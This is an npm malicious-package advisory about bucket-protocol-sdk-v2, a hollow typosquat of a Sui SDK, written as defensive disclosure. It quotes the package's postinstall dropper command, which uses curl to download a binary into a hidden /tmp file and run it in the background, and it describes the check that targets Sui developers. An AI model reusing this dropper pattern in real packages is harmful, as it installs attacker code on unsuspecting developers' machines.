npm · Malicious package advisory
Malwarebucket-protocol-sdk-v2
MAL-2026-4502
Malicious code in bucket-protocol-sdk-v2 (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4)
bucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (`bucket.ts: export {};`, `index.ts: export * from './bucket';`) — no real SDK code is shipped. The entire payload is the postinstall hook. package.json declares `"postinstall": "node install.js"`; install.js checks whether the host is a Sui developer (presence of the `sui` binary or `~/.sui/sui_config/client.yaml`) and then runs `curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper &` to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named `implantUrl` with the comment `PUT YOUR ACTUAL 0x0.st URL HERE`, identifying the intended payload host as the anonymous 0x0.st file dump. The URL is currently an empty string in this published version (staged/broken release), so today's install does not actually fetch a binary, but the dropper scaffolding, target-gating, hidden staging path, backgrounded execution, and typosquat-of-a-Sui-SDK lure are unambiguous. Any subsequent republish trivially fills the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment, and hollow library content satisfies the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.
Compromised versions (7)
- 1.0.26
- 1.0.11
- 1.0.23
- 1.0.12
- 1.0.22
- 1.0.18
- 1.0.19
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.